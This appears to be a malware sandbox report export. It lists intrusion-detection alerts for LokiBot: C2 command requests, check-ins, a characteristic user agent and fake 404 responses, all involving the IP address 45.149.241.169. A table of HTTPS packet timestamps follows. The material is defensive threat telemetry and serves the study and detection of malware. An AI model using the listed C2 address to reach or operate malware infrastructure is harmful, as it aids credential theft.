2024-10-03T09:22:31.486447+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64434 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:31.486447+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64434 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:31.491241+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64434 | TCP |
2024-10-03T09:22:31.674682+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64435 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:31.674682+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64435 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:31.674682+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64435 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:32.303507+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64435 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:32.303507+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64435 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:32.311823+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64435 | TCP |
2024-10-03T09:22:32.502916+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64436 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:32.502916+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64436 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:32.502916+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64436 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:33.188157+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64436 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:33.188157+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64436 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:33.193006+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64436 | TCP |
2024-10-03T09:22:33.340490+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64437 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:33.340490+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64437 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:33.340490+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64437 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:34.292855+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64437 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:34.292855+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64437 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:34.448158+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64438 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:34.448158+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64438 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:34.448158+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64438 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:35.079411+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64438 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:35.079411+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64438 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:35.085142+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64438 | TCP |
2024-10-03T09:22:35.225001+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64439 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:35.225001+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64439 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:35.225001+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64439 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:35.848697+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64439 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:35.848697+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64439 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:35.853534+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64439 | TCP |
2024-10-03T09:22:36.015476+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64440 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:36.015476+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64440 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:36.015476+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64440 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:36.750157+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64440 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:36.750157+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64440 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:36.755143+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64440 | TCP |
2024-10-03T09:22:36.917140+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64441 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:36.917140+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64441 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:36.917140+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64441 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:37.777548+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64441 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:37.777548+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64441 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:37.782566+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64441 | TCP |
2024-10-03T09:22:37.931400+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64442 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:37.931400+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64442 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:37.931400+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64442 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:38.687921+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64442 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:38.687921+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64442 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:38.692949+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64442 | TCP |
2024-10-03T09:22:38.836712+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64443 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:38.836712+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64443 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:38.836712+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64443 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:39.523859+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64443 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:39.523859+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64443 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:39.530058+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64443 | TCP |
2024-10-03T09:22:39.681925+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64444 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:39.681925+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64444 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:39.681925+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64444 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:40.350489+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64444 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:40.350489+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64444 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:40.355345+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64444 | TCP |
2024-10-03T09:22:40.614660+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64445 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:40.614660+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64445 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:40.614660+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64445 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:41.352352+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64445 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:41.352352+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64445 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:41.357295+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64445 | TCP |
2024-10-03T09:22:41.558183+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64446 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:41.558183+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64446 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:41.558183+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64446 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:42.187830+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64446 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:42.187830+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64446 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:42.192690+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64446 | TCP |
2024-10-03T09:22:42.344416+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64447 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:42.344416+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64447 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:42.344416+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64447 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:43.088359+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64447 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:43.088359+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64447 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:43.095306+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64447 | TCP |
2024-10-03T09:22:43.251789+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64448 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:43.251789+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64448 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:43.251789+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64448 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:43.911035+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64448 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:43.911035+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64448 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:43.915998+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64448 | TCP |
2024-10-03T09:22:44.067474+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64449 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:44.067474+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64449 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:44.067474+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64449 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:44.840138+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64449 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:44.840138+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64449 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:44.845008+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64449 | TCP |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Oct 3, 2024 09:20:40.672699928 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:40.672744036 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:40.672816992 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:40.683554888 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:40.683572054 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:41.147365093 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:41.147464037 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:41.151506901 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:41.151516914 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:41.151813984 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:41.162029028 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:41.207395077 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:41.801786900 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:41.852828026 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:43.034029961 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:43.034097910 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:43.034127951 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:43.034145117 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:43.034152985 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:43.034190893 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:43.034198046 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:43.087167978 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:43.126534939 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:43.126604080 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:43.126633883 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:43.126686096 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:43.126694918 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:43.126748085 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:43.234178066 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:43.234283924 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:43.234323978 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:43.234361887 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:43.234448910 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:43.234466076 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:43.234577894 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:43.234586000 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:43.234674931 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:43.359283924 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:43.359345913 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:43.359415054 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:43.359427929 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:43.415311098 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:43.447220087 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:43.447319031 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:43.447375059 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:43.447380066 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:43.447395086 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:43.447432995 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:43.538100004 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:43.538161993 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:43.538186073 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:43.538207054 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:43.538211107 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:43.538230896 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:43.538256884 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:43.587136984 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:43.587148905 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:43.613109112 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:43.613172054 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:43.613188028 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:43.615318060 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:43.615371943 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:43.615379095 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:43.665298939 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:43.713967085 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:43.714024067 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:43.714087009 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:43.714092970 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:43.714123011 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:43.714163065 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:43.714211941 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:43.759073973 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:43.759114981 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:43.805934906 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:43.846018076 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:43.849173069 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:43.849183083 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:43.849204063 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:43.849261045 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:43.849281073 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:43.849328995 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:43.897768021 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:43.897777081 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:43.897895098 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:43.897911072 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:43.897964954 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:44.023113012 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:44.023123980 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:44.023159981 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:44.023279905 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:44.023312092 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:44.023374081 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:44.118278027 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:44.118288040 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:44.118320942 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:44.118398905 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:44.118427038 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:44.118442059 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:44.118480921 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:44.119322062 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:44.119381905 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:44.228482962 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:44.228574038 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:44.230460882 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:44.230504036 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:44.230540991 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:44.230551958 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:44.230607986 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:44.317517042 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:44.317709923 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:44.317814112 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:44.317883015 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:44.317890882 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:44.368488073 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:44.410017967 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:44.410032034 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:44.410145044 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:44.536700964 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:44.536720991 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:44.536851883 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:44.536864996 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:44.536915064 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:44.558695078 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:44.558783054 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:44.616894007 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:44.616945982 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
